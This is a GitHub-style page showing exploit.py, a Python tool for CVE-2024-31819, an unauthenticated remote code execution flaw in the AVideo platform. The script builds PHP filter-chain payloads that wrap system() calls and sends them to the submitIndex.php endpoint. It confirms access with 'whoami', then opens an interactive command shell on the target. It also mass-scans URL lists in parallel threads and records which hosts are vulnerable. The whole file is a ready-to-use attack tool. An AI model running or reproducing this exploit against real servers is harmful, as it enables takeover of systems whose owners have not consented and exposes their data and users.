-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
242 lines (211 loc) · 8.85 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
import re
import requests
import argparse
from packaging import version
from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from php_filter_chain import PHPFilterChainGenerator
from concurrent.futures import ThreadPoolExecutor, as_completed
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
class AVideoExploit:
def __init__(self, base_url):
self.console = Console()
self.base_url = base_url
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
)
def generate_php_filter_payload(self, command):
generator = PHPFilterChainGenerator()
return generator.generate_filter_chain(command)
def send_payload(self, payload):
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
response = requests.post(
f"{self.base_url}/plugin/WWBNIndex/submitIndex.php",
data={"systemRootPath": payload},
headers=headers,
verify=False,
timeout=10,
)
if response.status_code == 200:
return response.text
else:
return False
except requests.exceptions.RequestException as e:
return False
def parse_output(self, output):
match = re.search(r"\[S\](.*?)\[E\]", output, re.DOTALL)
if match:
return match.group(1).strip()
else:
return None
def interactive_shell(self):
session = PromptSession(history=InMemoryHistory())
while True:
try:
cmd = session.prompt(
HTML("<ansiyellow><b>$ </b></ansiyellow>"), default=""
).strip()
if cmd.lower() == "exit":
break
if cmd.lower() == "clear":
self.console.clear()
continue
php_code = f"<?php echo '[S]';system('{cmd}');echo '[E]';?>"
payload = self.generate_php_filter_payload(php_code)
output = self.send_payload(payload)
if output:
clean_output = self.parse_output(output)
if clean_output:
print(f"{clean_output}\n")
else:
self.custom_print(
"No command output returned or error occurred.", "-"
)
else:
self.custom_print(
"Failed to receive response from the server.", "-"
)
except KeyboardInterrupt:
self.custom_print("Exiting interactive shell...", "!")
break
def check_single_url(self, url):
try:
version_status, avideo_version = self.is_version_vulnerable(url)
if version_status:
php_code = "<?php echo '[S]';system('whoami');echo '[E]';?>"
payload = self.generate_php_filter_payload(php_code)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(
f"{url}/plugin/WWBNIndex/submitIndex.php",
data={"systemRootPath": payload},
headers=headers,
verify=False,
timeout=10,
)
if response.status_code == 200:
output = self.parse_output(response.text)
if output:
return (
f"{url} is vulnerable, Version: {avideo_version}, Command output: {output}\n",
True,
)
return (
f"{url} is not vulnerable or failed to execute command, Version: {avideo_version}\n",
False,
)
elif avideo_version:
return (
f"{url} Version: {avideo_version} is not within the vulnerable range.\n",
False,
)
else:
return (
f"{url} AVideo version could not be determined. Manual check advised.\n",
False,
)
except requests.exceptions.RequestException:
return (f"{url} Request failed.\n", False)
def check_avideo_version(self, url):
try:
response = requests.get(url, verify=False, timeout=10)
version_pattern = re.compile("Powered by AVideo ® Platform v([\d.]+)")
match = version_pattern.search(response.text)
if match:
return match.group(1)
comment_version_pattern = re.compile(r"<!--.*?v:([\d.]+).*?-->", re.DOTALL)
comment_match = comment_version_pattern.search(response.text)
if comment_match:
return comment_match.group(1)
except requests.exceptions.RequestException as e:
return None
def is_version_vulnerable(self, url):
avideo_version_str = self.check_avideo_version(url)
if avideo_version_str is None:
return True, "unknown"
parsed_version = version.parse(avideo_version_str)
if isinstance(parsed_version, version.Version):
is_vulnerable = (
version.parse("12.4") <= parsed_version <= version.parse("14.2")
)
return is_vulnerable, avideo_version_str
else:
return True, avideo_version_str
def check_urls_and_write_output(self, urls, max_workers, output_path):
with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar(
len(urls), enrich_print=False
) as bar:
futures = {executor.submit(self.check_single_url, url): url for url in urls}
for future in as_completed(futures):
result, is_vulnerable = future.result()
if is_vulnerable:
self.custom_print(result, "+")
if output_path:
with open(output_path, "a") as file:
file.write(result)
bar()
if output_path:
print(f"Results written to {output_path}")
def main():
parser = argparse.ArgumentParser(
description="AVideo CVE-2024-31819 - Unauthenticated Remote Code Execution"
)
parser.add_argument("-u", "--url", help="Base URL for single target", default=None)
parser.add_argument(
"-f", "--file", help="File containing list of URLs", default=None
)
parser.add_argument(
"-t", "--threads", help="Number of threads to use", type=int, default=20
)
parser.add_argument(
"-o", "--output", help="Output file to save results", default=None
)
args = parser.parse_args()
if not args.url and not args.file:
print(
"Error: No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs."
)
return
avideo = AVideoExploit(args.url)
if args.url:
is_vulnerable_version, avideo_version = avideo.is_version_vulnerable(args.url)
proceed_with_check = True
if avideo_version != "unknown":
if is_vulnerable_version:
avideo.custom_print(
f"Version {avideo_version} is within the vulnerable range. Proceeding with vulnerability check.",
"+",
)
else:
avideo.custom_print(
f"Version {avideo_version} is not within the vulnerable range. Detected version: {avideo_version}",
"-",
)
proceed_with_check = False
else:
avideo.custom_print(
"Unable to determine AVideo version. Proceeding with vulnerability check as a precaution.",
"!",
)
if proceed_with_check:
output, is_vulnerable = avideo.check_single_url(args.url)
if is_vulnerable:
avideo.custom_print(output, "+")
avideo.interactive_shell()
else:
avideo.custom_print(
"The URL is not vulnerable or failed to execute the command.", "-"
)
elif args.file:
with open(args.file, "r") as f:
urls = f.read().splitlines()
avideo.check_urls_and_write_output(urls, args.threads, args.output)
if __name__ == "__main__":
main()